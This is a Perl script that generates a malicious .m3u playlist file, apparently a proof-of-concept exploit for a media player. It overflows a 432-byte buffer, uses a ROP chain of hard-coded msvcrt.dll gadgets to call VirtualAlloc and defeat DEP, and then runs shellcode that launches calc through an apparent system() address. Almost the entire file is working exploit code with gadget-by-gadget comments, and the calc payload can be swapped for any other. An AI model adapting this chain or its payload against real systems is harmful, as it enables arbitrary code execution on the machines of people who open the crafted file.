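#!/usr/bin/perl
# Proof-of-concept generator: writes ropfinal.m3u, a playlist that overflows a
# 432-byte buffer and then runs a VirtualAlloc() ROP chain built entirely from
# msvcrt.dll gadgets, followed by a short stub that pushes "calc" and calls a
# hard-coded msvcrt address.
#
# NOTE(review): every gadget address below is a hard-coded msvcrt.dll virtual
# address, so this chain only holds for the exact msvcrt.dll build it was
# generated against. On a host with a different msvcrt (or with ASLR applied
# to it) the addresses are wrong and the chain must be regenerated.
#
# Fixes over the original: strictures, three-arg open with a lexical handle,
# checked open/close, and binmode on the output so a text-mode layer cannot
# translate a 0x0A byte in the payload into 0x0D 0x0A.
use strict;
use warnings;

my $file   = "ropfinal.m3u";
my $buffer = "A" x 432;                       # padding up to the saved return address

# Saved return address -> RETN, which starts the chain with ESP at the next dword.
$buffer .= pack('V', 0x77c11110);             # RETN [msvcrt.dll]
#$buffer .= "A" x 4;                           # offset markers left from testing
#$buffer .= "B" x 4;
#$buffer .= "C" x 4;

# --- register setup for VirtualAlloc(), consumed by PUSHAD below ------------
$buffer .= pack('V', 0x77c534a5);             # POP EBP # RETN [msvcrt.dll]
$buffer .= pack('V', 0x77c534a5);             # EBP = POP EBP # RETN (skip 4 bytes once VirtualAlloc returns)
$buffer .= pack('V', 0x77c46ea3);             # POP EBX # RETN [msvcrt.dll]
$buffer .= pack('V', 0xffffffff);             # EBX = -1 ...
$buffer .= pack('V', 0x77c127e1);             # INC EBX # RETN [msvcrt.dll]
$buffer .= pack('V', 0x77c127e1);             # INC EBX # RETN -> EBX = 0x00000001 (dwSize)
$buffer .= pack('V', 0x77c3b860);             # POP EAX # RETN [msvcrt.dll]
$buffer .= pack('V', 0x2cfe1467);             # delta: 0x2cfe1467 + 0x75c13b66 + 0x5d40c033 == 0x00001000 (mod 2^32)
$buffer .= pack('V', 0x77c4eb80);             # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
$buffer .= pack('V', 0x77c58fbc);             # XCHG EAX,EDX # RETN -> EDX = 0x1000 (MEM_COMMIT)
$buffer .= pack('V', 0x77c34fcd);             # POP EAX # RETN [msvcrt.dll]
$buffer .= pack('V', 0x2cfe04a7);             # delta: 0x2cfe04a7 + 0x75c13b66 + 0x5d40c033 == 0x00000040 (mod 2^32)
$buffer .= pack('V', 0x77c4eb80);             # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
$buffer .= pack('V', 0x77c14001);             # XCHG EAX,ECX # RETN -> ECX = 0x40 (PAGE_EXECUTE_READWRITE)
$buffer .= pack('V', 0x77c47ae8);             # POP EDI # RETN [msvcrt.dll]
$buffer .= pack('V', 0x77c47a42);             # EDI = RETN (ROP NOP) [msvcrt.dll]
$buffer .= pack('V', 0x77c2b104);             # POP ESI # RETN [msvcrt.dll]
$buffer .= pack('V', 0x77c2aacc);             # ESI = JMP [EAX] [msvcrt.dll]
$buffer .= pack('V', 0x77c5289b);             # POP EAX # RETN [msvcrt.dll]
$buffer .= pack('V', 0x77c1110c);             # EAX = ptr to &VirtualAlloc() [IAT msvcrt.dll]
$buffer .= pack('V', 0x77c12df9);             # PUSHAD # RETN [msvcrt.dll]
$buffer .= pack('V', 0x77c35524);             # ptr to 'push esp # ret' [msvcrt.dll] -> lands in the NOP sled

# --- payload ----------------------------------------------------------------
$buffer .= "\x90" x 16;                       # NOP sled
$buffer .= "\x31\xC9"                          # xor ecx,ecx
         . "\x51"                              # push ecx            (NUL terminator)
         . "\x68\x63\x61\x6C\x63"              # push 0x636c6163     ("calc")
         . "\x54"                              # push esp            (pointer to "calc\0")
         . "\xB8\xC7\x93\xC2\x77"              # mov eax,0x77c293c7  (hard-coded msvcrt address; presumably system() -- verify against the target msvcrt)
         . "\xFF\xD0";                         # call eax

# Write the payload as raw bytes. binmode matters on Windows, where a text-mode
# handle would rewrite any 0x0A byte as 0x0D 0x0A and corrupt the chain.
open(my $fh, '>', $file) or die "open $file: $!";
binmode($fh);
print {$fh} $buffer;
close($fh) or die "close $file: $!";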